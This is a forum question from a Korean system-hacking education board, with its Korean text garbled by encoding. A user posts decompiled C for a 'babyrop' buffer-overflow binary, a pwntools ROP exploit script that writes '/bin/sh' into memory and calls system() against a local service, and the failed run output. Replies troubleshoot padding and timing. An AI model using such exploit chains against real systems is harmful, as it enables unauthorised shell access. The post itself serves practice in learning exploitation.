½Ã½ºÅÛ ÇØÅ·

 1574, 17/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   tkakr7458
   pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1859 [º¹»ç]


int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [sp+Ch] [bp-8Ch]@1
  int v5; // [sp+8Ch] [bp-Ch]@1

  v5 = 0;
  system("echo \"it's very very easy buffer overflow\"");
  read(0, &buf, 0x100u);
  printf("buf: %s\n", &buf);
  return 0;
}

À§´Â ¼Ò½º ÄÚµåÀÔ´Ï´Ù.

from pwn import*

elf = ELF("./babyrop")
conn = remote("localhost",9999)


binsh = "/bin/sh\00"
bss = 0x08049f14
read_plt = elf.plt['read']
system_plt = elf.plt['system']
pppr = 0x804853

print "system@plt : " +hex(system_plt)
print "read@plt : " +hex(read_plt)
print "pppr : " +hex(pppr)

payload = "A"*144
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh)+1)

payload += p32(system_plt)
payload += "AAAA"
payload += p32(bss)

print "expolt start"

conn.send(payload)
conn.send(binsh)

conn.send("id\n")
conn.interactive()

À§¿Í °°ÀÌ ÀÛ¼ºÇß½À´Ï´Ù.

[*] '/home/jack2/Desktop/babyrop'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to localhost on port 9999: Done
system@plt : 0x8048340
read@plt : 0x8048320
pppr : 0x804853
expolt start
[*] Switching to interactive mode
it's very very easy buffer overflow
[*] Got EOF while reading in interactive
$ id
[*] Closed connection to localhost port 9999
[*] Got EOF while sending in interactive

ÀÌ·¸°Ô ¼º°øÀ» ¸øÇߴµ¥ ¿Ö ÀÌ·¯³ª¿ä ¤Ð¤Ð °¡Á¬Àº ¶È¹Ù·Î ã¾Ò½À´Ï´Ù.!!

  Hit : 7430     Date : 2017/04/16 06:06



    
ÇØÄð·¯ buf°¡ ebp-0x8c¿¡ ÀÖÀ¸´Ï 0x8c+4 Çؼ­ 144¹ÙÀÌÆ®¸¸Å­ ¸ÇóÀ½¿¡ A¸¦ ³ÖÀ¸¼Å¾ß ÇÕ´Ï´Ù 140°³¹Û¿¡ ¾È³ÖÀ¸¼Å¼­ ¾ÈµÇ´Â°Ì´Ï´Ù 2017/04/16  
tkakr7458 144 ³Ö¾ú¾î¿ä.. 2017/04/16  
ÇØÄð·¯ ¾Æ Á¦°¡ À߸øºÃ±º¿ä ±×·¯¸é s.send(payload)¿Í s.send(binsh) »çÀÌ¿¡ time.sleep(0.5)¸¦ ³Ö¾îº¸¼¼¿ä
Àú·¸°Ô ªÀº ½Ã°£Â÷·Î ÁÖ¸é ¹öÆÛ´Â Å«µ¥ ÀÛÀº ¹®ÀÚ¿­ µÎ°³°¡ ¿À´Ï±î µÑ´Ù buf¿¡ µé¾î°¥ ¼ö ÀÖ½À´Ï´Ù
2017/04/16  
tkakr7458 Àß ¾ÈµÇ³×¿ä ¤Ð 2017/04/16  
ÇØÄð·¯ strace¸¦ ½áº¸¼¼¿ä ¾öû ÁÁ½À´Ï´Ù
remote() ¹Ù·Î ´ÙÀ½¿¡ pause() ÇÑÁÙ ³ÖÀ¸½Ã°í ÆÄÀ̽㠽ÇÇàÇÏ½Ã¸é ¸ØÃçÀִµ¥
±× ¶§ ¼­¹ö¿¡¼­ strace -if -p $(pgrep babyrop) ÇÏ½Ã¸é ¾îÅÂÄ¡ µÇ°í ÆÄÀ̽㿡¼­ ¿£ÅÍ Çѹø Ä¡¼Å¼­ º¸½Ã¸é µË´Ï´Ù
2017/04/16  
parktong80 Ȥ½Ã babyrop ¹ÙÀ̳ʸ® º¸³»ÁֽǼö ÀÖÀ¸½Å°¡¿ä?
parktong80@naver.com ÀÔ´Ï´Ù
2017/05/03  
1254   gcc 2.96½ºÅñ¸Á¶ÀÇ º¯È­ ¾î¶»°Ô ¾Ë ¼ö ÀÖ³ª¿ä?[4]     topnons
01/02 3484
1253   »çÀ̹ö¼ö»ç´ëÁú¹®Á¡[1]     tolta
01/13 3242
1252   ¶Ç Áú¹®ÇÔ[1]     tolta
04/19 3021
1251   ¶Ç »çÀ̹ö¼ö»ç´ë Áú¹®Á¡¿© ¤»....[2]     tolta
01/15 3140
1250   Áú¹®Á»ÇÏ°Ù½À´Ï´Ù[4]     tolta
02/25 3414
1249   NC¼ÒÇÁÆ®¸¦ »ó´ë·Î ¼Ò¼Û ÁغñÁß¿¡ ÀÖ½À´Ï´Ù.      TOGEACE
12/09 3393
1248   ¸¹Àº´äº¯¹Ù¶÷´Ï´Ù...[4]     tnvlfdl1
03/09 3191
1247   ¾Æ ¹ÌÃĹö¸®³×-.-[2]     tlsdbcjs
03/31 3811
1246   À¥ÇØÅ· ½ÎÀÌÆ® ÀÖ³ª¿ä?[3]     tlsdbcjs
03/09 4561
1245   °£´ÜÇÑ Áú¹®Á»...[1]     tlqaksqhr
12/06 3163
1244   rop ´ÙÀ½¿¡ ¹¹¸¦ °øºÎÇÏ´Â°Ô ÁÁÀ»±î¿ä?[1]     tloet
08/26 2098
1243   µµ¿ÍÁÖ¼¼¿ä~[1]     tkfkwufk
06/18 3279
  pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®[6]     tkakr7458
04/16 7429
1241   format string bug + got overwite[3]     tkakr7458
04/19 2473
1240   ½©Äڵ带 ÀÌ¿ëÇؼ­ bof ¸¦ ÇÒ¶§[4]     tkakr7458
05/22 2742
1239   ÇØÄ¿½ºÄð¿¡¼­ Á¦°øÇÏ´Â BOF º¸°í ÇÏ´øµµÁß Áú¹®ÀÔ´Ï´Ù.     tjzmfls
10/11 2903
1238   Áú¹®ÀÌÀÖ¾î¿ä!![4]     tjdqlsd234
10/09 3134
1237   Àú±â¿ä ÇØÅ· ÇÒ¶§¿ä[3]     tjdkstn
02/07 3501
1236   ´ëÇб³¶õ ½Ã½ºÅÛÇØÅ· 21°­ºÎÅÍ 26°­ ¸øµé¾î°¡°ÔÇسù³×¿ä[6]     tjddnr0306
05/24 3815
1235   ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ BOF °ø°Ý½Ã Àǹ®Á¡ Áú¹®ÀÔ´Ï´Ù.[5]     tjdalstjr938
01/02 2413
[1]..[11][12][13][14][15][16] 17 [18][19][20]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org